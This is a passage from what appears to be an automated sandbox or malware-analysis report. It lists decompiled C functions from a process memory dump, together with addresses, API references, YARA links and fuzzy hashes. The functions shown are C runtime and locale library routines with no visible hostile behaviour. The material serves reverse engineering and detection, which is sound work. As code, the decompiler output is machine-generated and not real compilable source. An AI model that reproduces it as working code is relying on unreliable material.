							_t71 = E0041BDFC(_t122, _t127, _v8, _a8, 0xffffffff);
							_t135 = _t135 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t122 = E004172B7(_t97, _t103, _a4, _t127);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t122);
							_push(_t122);
							_push(_t122);
							_push(_t122);
							E00413735();
							asm("int3");
							E0040B210(_t120, 0x4362e0, 0x1c);
							_t129 = _a4;
							_t75 = E004149A3(_t97, _t120, _t122, _t129, _t129, _a8);
							_t108 = _t122;
							_t124 = _t75;
							__eflags = _t124;
							if(_t124 != 0) {
								_t76 = E00418C71(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0041C09D( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t124, 0,  &_v48);
								_t137 = _t135 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E00415216(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t124 = 0;
										_t86 = E0041C09D( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t137 = _t137 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t125 = _v48;
											E00414927(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t130 = _t129 + _t129;
											_t120 =  *(_t125 + 0x24 + _t130 * 8);
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t125 + 0x24 + _t130 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004155C5( *(_t125 + 0x24 + _t130 * 8));
													_pop(_t116);
													 *(_t125 + 0x24 + _t130 * 8) =  *(_t125 + 0x24 + _t130 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x4382e8 & 0x00000001;
												if(( *0x4382e8 & 0x00000001) == 0) {
													__eflags =  *(_t125 + 0x24 + _t130 * 8);
													if( *(_t125 + 0x24 + _t130 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E004155C5( *(_t125 + 0x24 + _t130 * 8));
															_t51 = _t125 + 0x24 + _t130 * 8;
															 *_t51 =  *(_t125 + 0x24 + _t130 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t125 + 0xc));
											 *(_t125 + 0x24 + _t130 * 8) = _t99;
											 *((intOrPtr*)(_t125 + 0x1c + _t130 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E00414B94();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t124);
												_push(_t124);
												_push(_t124);
												_push(_t124);
												_push(_t124);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E004155C5(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E00413735();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E0040B256(_t120);
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E004172B7(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

0x004149a3
0x004149a3
0x004149a8
0x004149ad
0x004149bd
0x004149be
0x004149c7
0x004149cf
0x004149d4
0x004149d7
0x004149d9
0x004149e5
0x004149ef
0x004149f2
0x004149f3
0x004149f5
0x00414a26
0x00414a27
0x00414a2d
0x00000000
0x004149f7
0x00414a01
0x00414a06
0x00414a09
0x00414a0b
0x00414a24
0x00000000
0x00414a0d
0x00414a0d
0x00414a10
0x00000000
0x00414a12
0x00414a12
0x00414a15
0x00000000
0x00414a17
0x00000000
0x00414a17
0x00414a15
0x00414a10
0x00414a0b
0x004149db
0x004149db
0x004149de
0x00414a35
0x00414a35
0x00414a36
0x00414a37
0x00414a38
0x00414a3a
0x00414a3f
0x00414a47
0x00414a4f
0x00414a53
0x00414a59
0x00414a5a
0x00414a5c
0x00414a5e
0x00414a67
0x00414a6c
0x00414a72
0x00414a75
0x00414a78
0x00414a7d
0x00414a8c
0x00414a91
0x00414a94
0x00414a96
0x00414ab0
0x00414abd
0x00414abf
0x00414ac1
0x00000000
0x00414ac3
0x00414ac3
0x00414ac6
0x00414ac9
0x00414ad4
0x00414ad7
0x00414adc
0x00414adf
0x00414ae1
0x00414b04
0x00414b04
0x00414b09
0x00414b0e
0x00414b0f
0x00414b13
0x00414b15
0x00414b19
0x00414b1c
0x00414b1e
0x00414b22
0x00414b26
0x00414b2c
0x00414b31
0x00414b32
0x00414b37
0x00414b37
0x00414b37
0x00414b26
0x00414b3a
0x00414b3d
0x00414b44
0x00414b46
0x00414b4d
0x00414b53
0x00414b55
0x00414b57
0x00414b5b
0x00414b5c
0x00414b62
0x00414b68
0x00414b68
0x00414b68
0x00414b68
0x00414b5c
0x00414b55
0x00414b4d
0x00414b70
0x00414b72
0x00414b79
0x00414b7d
0x00414b84
0x00414ae3
0x00414ae3
0x00414ae6
0x00414aed
0x00414aed
0x00414aee
0x00414aef
0x00414af0
0x00414af1
0x00000000
0x00414ae8
0x00414ae8
0x00414aeb
0x00414af4
0x00414af6
0x00000000
0x00414af8
0x00414af9
0x00000000
0x00414afe
0x00000000
0x00000000
0x00000000
0x00414aeb
0x00414ae6
0x00414ae1
0x00414a98
0x00414a98
0x00414a9b
0x00414aa2
0x00414aa2
0x00414aa3
0x00414aa4
0x00414aa5
0x00414aa6
0x00414aa7
0x00414aa7
0x00414a9d
0x00414a9d
0x00414aa0
0x00000000
0x00000000
0x00414aa0
0x00414aac
0x00414aae
0x00000000
0x00000000
0x00000000
0x00000000
0x00414aae
0x00414a60
0x00414a60
0x00414a60
0x00414b90
0x004149e0
0x004149e0
0x004149e3
0x00000000
0x00000000
0x00000000
0x00000000
0x004149e3
0x004149de
0x004149af
0x004149b4
0x00414a31
0x00414a34
0x00414a34

APIs

__cftoe.LIBCMT ref: 004149CF
__cftoe.LIBCMT ref: 00414A01

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 818829847bd1cc353e71b968f879429d8056de1173645ccc0f82a50e67fd0f3e
Instruction ID: 1c3126ac71b8c6bf4b1c4444643938c49a04c8808b5c84b56f990cd3e879e94c
Opcode Fuzzy Hash: 818829847bd1cc353e71b968f879429d8056de1173645ccc0f82a50e67fd0f3e
Instruction Fuzzy Hash: 49512B72944205ABDB209B698C41FEF77B9DFC8364F21411FF41592282EB3CD9C1866C

Uniqueness

Uniqueness Score: -1.00%

Function 00408145, Relevance: 9.1, APIs: 6, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408145(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t19;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				void* _t49;

				_t42 = __edx;
				E00424FAC(E004263A8, __ecx, __edi, __esi, _t49, __fp0);
				_push(__esi);
				_push(__edi);
				E00409149(_t49 - 0x14, 0);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				_t44 =  *0x439e90; // 0xa6f1b8
				 *((intOrPtr*)(_t49 - 0x10)) = _t44;
				_t19 = E0040162E(0x439e9c, _t44, __esi, __fp0);
				_t34 =  *((intOrPtr*)(_t49 + 8));
				_t47 = E00401722( *((intOrPtr*)(_t49 + 8)), _t19);
				if(_t47 == 0) {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t49 + 8)));
						_push(_t49 - 0x10);
						__eflags = E00408681(_t34, _t42, _t44, _t47, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E004013DF(_t49 - 0x20);
							E0040CD4A(_t49 - 0x20, 0x436790);
						}
						_t47 =  *((intOrPtr*)(_t49 - 0x10));
						 *0x439e90 = _t47;
						 *((intOrPtr*)( *_t47 + 4))();
						E004093B3(__eflags, _t47);
					} else {
						_t47 = _t44;
					}
				}
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				E004091A1(_t49 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t47;
			}

0x00408145
0x0040814a
0x00408152
0x00408153
0x00408159
0x0040815e
0x00408167
0x0040816d
0x00408170
0x00408175
0x0040817e
0x00408182
0x00408186
0x0040818c
0x00408192
0x0040819a
0x0040819d
0x004081a2
0x004081b0
0x004081b0
0x004081b5
0x004081ba
0x004081c2
0x004081c6
0x00408188
0x00408188
0x00408188
0x00408186
0x004081cc
0x004081d3
0x004081df
0x004081e9

APIs

__EH_prolog.LIBCMT ref: 0040814A
std::_Lockit::_Lockit.LIBCPMT ref: 00408159

Part of subcall function 0040162E: __EH_prolog.LIBCMT ref: 00401633
Part of subcall function 0040162E: std::_Lockit::_Lockit.LIBCPMT ref: 00401647
Part of subcall function 0040162E: std::_Lockit::~_Lockit.LIBCPMT ref: 00401667

std::locale::_Getfacet.LIBCPMT ref: 00408179
__CxxThrowException@8.LIBVCRUNTIME ref: 004081B0
std::_Facet_Register.LIBCPMT ref: 004081C6
std::_Lockit::~_Lockit.LIBCPMT ref: 004081D3

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: f8035429c17ce0423dd8f47f8e6e35fb2418a098dfde39746e7de7b3bb04cea7
Instruction ID: 0fee6785516435f30c03df074f62165448ab0c48550068494d8eaa9a11c3723b
Opcode Fuzzy Hash: f8035429c17ce0423dd8f47f8e6e35fb2418a098dfde39746e7de7b3bb04cea7
Instruction Fuzzy Hash: 7411C132A001299BCB10EBA4D9029AEB774EF84325F10023FE815BB2D1CF7D9D018798

Uniqueness

Uniqueness Score: -1.00%

Function 004081EA, Relevance: 9.1, APIs: 6, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004081EA(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t19;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				void* _t49;

				_t42 = __edx;
				E00424FAC(E004263A8, __ecx, __edi, __esi, _t49, __fp0);
				_push(__esi);
				_push(__edi);
				E00409149(_t49 - 0x14, 0);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				_t44 =  *0x439e8c; // 0xa26bd0
				 *((intOrPtr*)(_t49 - 0x10)) = _t44;
				_t19 = E0040162E(0x439ea0, _t44, __esi, __fp0);
				_t34 =  *((intOrPtr*)(_t49 + 8));
				_t47 = E00401722( *((intOrPtr*)(_t49 + 8)), _t19);
				if(_t47 == 0) {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t49 + 8)));
						_push(_t49 - 0x10);
						__eflags = E004085C2(_t34, _t42, _t44, _t47, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E004013DF(_t49 - 0x20);
							E0040CD4A(_t49 - 0x20, 0x436790);
						}
						_t47 =  *((intOrPtr*)(_t49 - 0x10));
						 *0x439e8c = _t47;
						 *((intOrPtr*)( *_t47 + 4))();
						E004093B3(__eflags, _t47);
					} else {
						_t47 = _t44;
					}
				}
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				E004091A1(_t49 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t47;
			}

0x004081ea
0x004081ef
0x004081f7
0x004081f8
0x004081fe
0x00408203
0x0040820c
0x00408212
0x00408215
0x0040821a
0x00408223
0x00408227
0x0040822b
0x00408231
0x00408237
0x0040823f
0x00408242
0x00408247
0x00408255
0x00408255
0x0040825a
0x0040825f
0x00408267
0x0040826b
0x0040822d
0x0040822d
0x0040822d
0x0040822b
0x00408271
0x00408278
0x00408284
0x0040828e

APIs

__EH_prolog.LIBCMT ref: 004081EF
std::_Lockit::_Lockit.LIBCPMT ref: 004081FE

Part of subcall function 0040162E: __EH_prolog.LIBCMT ref: 00401633
Part of subcall function 0040162E: std::_Lockit::_Lockit.LIBCPMT ref: 00401647
Part of subcall function 0040162E: std::_Lockit::~_Lockit.LIBCPMT ref: 00401667

std::locale::_Getfacet.LIBCPMT ref: 0040821E
__CxxThrowException@8.LIBVCRUNTIME ref: 00408255
std::_Facet_Register.LIBCPMT ref: 0040826B
std::_Lockit::~_Lockit.LIBCPMT ref: 00408278

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 3a5632619ba1b34eeac1299f4e92b2c793230035efe405009070bd32e9b716ad
Instruction ID: 0f767f68cdb37b1da5a11414b46165fca2a6acde20930d97e4eed887cfac069b
Opcode Fuzzy Hash: 3a5632619ba1b34eeac1299f4e92b2c793230035efe405009070bd32e9b716ad
Instruction Fuzzy Hash: 86119E32A005259BCF14EBA9D9569AEB774EF84724F10427FE811B72D1DF789E00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040828F, Relevance: 9.1, APIs: 6, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040828F(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t19;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				void* _t49;

				_t42 = __edx;
				E00424FAC(E004263A8, __ecx, __edi, __esi, _t49, __fp0);
				_push(__esi);
				_push(__edi);
				E00409149(_t49 - 0x14, 0);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				_t44 =  *0x439e84; // 0xa17198
				 *((intOrPtr*)(_t49 - 0x10)) = _t44;
				_t19 = E0040162E(0x439eb0, _t44, __esi, __fp0);
				_t34 =  *((intOrPtr*)(_t49 + 8));
				_t47 = E00401722( *((intOrPtr*)(_t49 + 8)), _t19);
				if(_t47 == 0) {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t49 + 8)));
						_push(_t49 - 0x10);
						__eflags = E0040853D(_t34, _t42, _t44, _t47, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E004013DF(_t49 - 0x20);
							E0040CD4A(_t49 - 0x20, 0x436790);
						}
						_t47 =  *((intOrPtr*)(_t49 - 0x10));
						 *0x439e84 = _t47;
						 *((intOrPtr*)( *_t47 + 4))();
						E004093B3(__eflags, _t47);
					} else {
						_t47 = _t44;
					}
				}
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				E004091A1(_t49 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t47;
			}

0x0040828f
0x00408294
0x0040829c
0x0040829d
0x004082a3
0x004082a8
0x004082b1
0x004082b7
0x004082ba
0x004082bf
0x004082c8
0x004082cc
0x004082d0
0x004082d6
0x004082dc
0x004082e4
0x004082e7
0x004082ec
0x004082fa
0x004082fa
0x004082ff
0x00408304
0x0040830c
0x00408310
0x004082d2
0x004082d2
0x004082d2
0x004082d0
0x00408316
0x0040831d
0x00408329
0x00408333

APIs

__EH_prolog.LIBCMT ref: 00408294
std::_Lockit::_Lockit.LIBCPMT ref: 004082A3

Part of subcall function 0040162E: __EH_prolog.LIBCMT ref: 00401633
Part of subcall function 0040162E: std::_Lockit::_Lockit.LIBCPMT ref: 00401647
Part of subcall function 0040162E: std::_Lockit::~_Lockit.LIBCPMT ref: 00401667

std::locale::_Getfacet.LIBCPMT ref: 004082C3
__CxxThrowException@8.LIBVCRUNTIME ref: 004082FA
std::_Facet_Register.LIBCPMT ref: 00408310
std::_Lockit::~_Lockit.LIBCPMT ref: 0040831D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: b4ed4d6e6a594762aa6799a3ab9972234f3ec592e769ea8739abd4c4945fafda
Instruction ID: 4a8dfc405934c9246befae5c7c7904dba18a6d9a45958cd481541a7656d7267b
Opcode Fuzzy Hash: b4ed4d6e6a594762aa6799a3ab9972234f3ec592e769ea8739abd4c4945fafda
Instruction Fuzzy Hash: 9211A332A005259BCB14EBA5D9069AE7774EF84764F10427FE811B72D1EF7D9D00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407DBF, Relevance: 9.1, APIs: 6, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407DBF(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t19;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				void* _t49;

				_t42 = __edx;
				E00424FAC(E004263A8, __ecx, __edi, __esi, _t49, __fp0);
				_push(__esi);
				_push(__edi);
				E00409149(_t49 - 0x14, 0);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				_t44 =  *0x439e88; // 0xa172f8
				 *((intOrPtr*)(_t49 - 0x10)) = _t44;
				_t19 = E0040162E(0x4391c0, _t44, __esi, __fp0);
				_t34 =  *((intOrPtr*)(_t49 + 8));
				_t47 = E00401722( *((intOrPtr*)(_t49 + 8)), _t19);
				if(_t47 == 0) {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t49 + 8)));
						_push(_t49 - 0x10);
						__eflags = E004019D0(_t34, _t42, _t44, _t47, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E004013DF(_t49 - 0x20);
							E0040CD4A(_t49 - 0x20, 0x436790);
						}
						_t47 =  *((intOrPtr*)(_t49 - 0x10));
						 *0x439e88 = _t47;
						 *((intOrPtr*)( *_t47 + 4))();
						E004093B3(__eflags, _t47);
					} else {
						_t47 = _t44;
					}
				}
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				E004091A1(_t49 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t47;
			}

0x00407dbf
0x00407dc4
0x00407dcc
0x00407dcd
0x00407dd3
0x00407dd8
0x00407de1
0x00407de7
0x00407dea
0x00407def
0x00407df8
0x00407dfc
0x00407e00
0x00407e06
0x00407e0c
0x00407e14
0x00407e17
0x00407e1c
0x00407e2a
0x00407e2a
0x00407e2f
0x00407e34
0x00407e3c
0x00407e40
0x00407e02
0x00407e02
0x00407e02
0x00407e00
0x00407e46
0x00407e4d
0x00407e59
0x00407e63

APIs

__EH_prolog.LIBCMT ref: 00407DC4
std::_Lockit::_Lockit.LIBCPMT ref: 00407DD3

Part of subcall function 0040162E: __EH_prolog.LIBCMT ref: 00401633
Part of subcall function 0040162E: std::_Lockit::_Lockit.LIBCPMT ref: 00401647
Part of subcall function 0040162E: std::_Lockit::~_Lockit.LIBCPMT ref: 00401667

std::locale::_Getfacet.LIBCPMT ref: 00407DF3
__CxxThrowException@8.LIBVCRUNTIME ref: 00407E2A
std::_Facet_Register.LIBCPMT ref: 00407E40
std::_Lockit::~_Lockit.LIBCPMT ref: 00407E4D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 6e91020ec96a54acf1b7ab4de21b02656152cadc0cada2dd3923ab77c70a8d9b
Instruction ID: e23d4a9d755a903cdc075bf8b3c2955a089293b00b281ca662775429fc6de935
Opcode Fuzzy Hash: 6e91020ec96a54acf1b7ab4de21b02656152cadc0cada2dd3923ab77c70a8d9b
Instruction Fuzzy Hash: B8119132E011259BCB14EBA5D8459AE7774EF84764F10427FE811B72D1DB789D00CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00418C71, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00418C71(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x438218; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00414C69(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0041A059(_t25, __eflags,  *0x438218, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00418AE3(_t25, _t31, 0x439c7c);
							E004155C5(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E004155C5();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E004151D3(_t20, _t29, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x438218; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00414C69(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0041A059(_t27, __eflags,  *0x438218, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00418AE3(_t27, _t32, 0x439c7c);
									E004155C5(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E004155C5();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0041A003(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0041A003(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00418c71
0x00418c71
0x00418c71
0x00418c7b
0x00418c7d
0x00418c82
0x00418c85
0x00418c93
0x00418c9a
0x00418c9f
0x00418ca2
0x00418ca5
0x00418cb7
0x00418cbc
0x00418cbe
0x00418cc9
0x00418cd0
0x00418cd5
0x00418cd8
0x00418cda
0x00000000
0x00000000
0x00000000
0x00000000
0x00418cc0
0x00418cc0
0x00000000
0x00418cc0
0x00418ca7
0x00418ca7
0x00418ca8
0x00418ca8
0x00418cad
0x00418ce8
0x00418ce9
0x00418cef
0x00418cf4
0x00418cf7
0x00418cf8
0x00418cf9
0x00418d00
0x00418d02
0x00418d04
0x00418d09
0x00418d0c
0x00418d1a
0x00418d26
0x00418d29
0x00418d2c
0x00418d3e
0x00418d43
0x00418d45
0x00418d50
0x00418d56
0x00418d5e
0x00418d60
0x00000000
0x00000000
0x00000000
0x00000000
0x00418d47
0x00418d47
0x00000000
0x00418d47
0x00418d2e
0x00418d2e
0x00418d2f
0x00418d2f
0x00418d62
0x00418d63
0x00418d63
0x00418d0e
0x00418d14
0x00418d18
0x00418d6b
0x00418d6c
0x00418d72
0x00000000
0x00000000
0x00000000
0x00418d18
0x00418d79
0x00418d79
0x00418c87
0x00418c8d
0x00418c91
0x00418cdc
0x00418cdd
0x00418ce7
0x00000000
0x00000000
0x00000000
0x00418c91

APIs

GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
_free.LIBCMT ref: 00418CA8
_free.LIBCMT ref: 00418CD0
SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CDD
SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
_abort.LIBCMT ref: 00418CEF

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 48883193890d190a370018905b0ab6b921f78567a6d6dd5428aefc493b32b0f6
Instruction ID: 4a5461152381541ea4dd7250c184cc12e06fc191061318fcacf3e812b533debc
Opcode Fuzzy Hash: 48883193890d190a370018905b0ab6b921f78567a6d6dd5428aefc493b32b0f6
Instruction Fuzzy Hash: 37F0A935646A0067D61233766D09BDB266A9FC1765B21012FF91492392FE3C89C341FD

Uniqueness

Uniqueness Score: -1.00%

Function 00408A1F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00408A1F(intOrPtr __ecx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t40;
				void* _t44;
				intOrPtr* _t45;
				void* _t51;
				void* _t52;
				void* _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t60;
				void* _t64;

				_t67 = __fp0;
				E00424FAC(E00426442, __ecx, _t52, _t55, _t58, __fp0);
				_push(_t44);
				_push(_t55);
				_push(_t52);
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x64;
				_t56 = __ecx;
				 *((intOrPtr*)(_t58 - 0x18)) = __ecx;
				_t45 = E004138FA(_t44, _t51);
				E00409C79(_t51, _t64, _t58 - 0x44);
				 *((intOrPtr*)(_t56 + 8)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) = 0;
				 *(_t58 - 4) = 0;
				if( *((char*)(_t58 + 0xc)) == 0) {
					 *((intOrPtr*)(_t58 - 0x14)) =  *((intOrPtr*)(_t45 + 8));
				} else {
					 *((intOrPtr*)(_t58 - 0x14)) = 0x4332a1;
				}
				_push(E00401596(_t58 - 0x70));
				 *((intOrPtr*)(_t56 + 8)) = E00408C1D(_t67,  *((intOrPtr*)(_t58 - 0x14)), 0);
				_push(_t58 - 0x44);
				 *((intOrPtr*)(_t56 + 0x10)) = E00408C1D(_t67, "false", 0);
				_push(_t58 - 0x44);
				_t40 = E00408C1D(_t67, "true", 0);
				 *((intOrPtr*)(_t56 + 0x14)) = _t40;
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				if( *((char*)(_t58 + 0xc)) == 0) {
					 *((char*)(_t56 + 0xc)) =  *((intOrPtr*)( *_t45));
					_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4))));
					 *((char*)(_t56 + 0xd)) = _t40;
				} else {
					 *((short*)(_t56 + 0xc)) = 0x2c2e;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t40;
			}

0x00408a1f
0x00408a24
0x00408a2c
0x00408a2d
0x00408a2e
0x00408a2f
0x00408a32
0x00408a34
0x00408a3c
0x00408a42
0x00408a4a
0x00408a4d
0x00408a50
0x00408a53
0x00408a5a
0x00408a68
0x00408a5c
0x00408a5c
0x00408a5c
0x00408a77
0x00408a81
0x00408a87
0x00408a93
0x00408a99
0x00408aa0
0x00408aa8
0x00408aab
0x00408ab3
0x00408ad2
0x00408ad8
0x00408ada
0x00408ab5
0x00408ab5
0x00408ab5
0x00408abe
0x00408acb

APIs

__EH_prolog.LIBCMT ref: 00408A24
__Getcvt.LIBCPMT ref: 00408A42
std::_Locinfo::_Getcvt.LIBCPMT ref: 00408A72

Strings

false, xrefs: 00408A89
true, xrefs: 00408A9B

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Getcvt$H_prologLocinfo::_std::_
String ID: false$true
API String ID: 312723928-2658103896
Opcode ID: 5a4bee4032014cc3cb98b6423f79a980b2abbedb57eab07cf6dc784ac4be8d7f
Instruction ID: d06247818ae6967dcbdc8046712e1a2904b4772ddb096281a700be5324fcf9c9
Opcode Fuzzy Hash: 5a4bee4032014cc3cb98b6423f79a980b2abbedb57eab07cf6dc784ac4be8d7f
Instruction Fuzzy Hash: 7621DE719047449EC720DFA6C5419AFFBF8EF85310F10816FE496A7291CB38AA41CF65

Uniqueness

Uniqueness Score: -1.00%

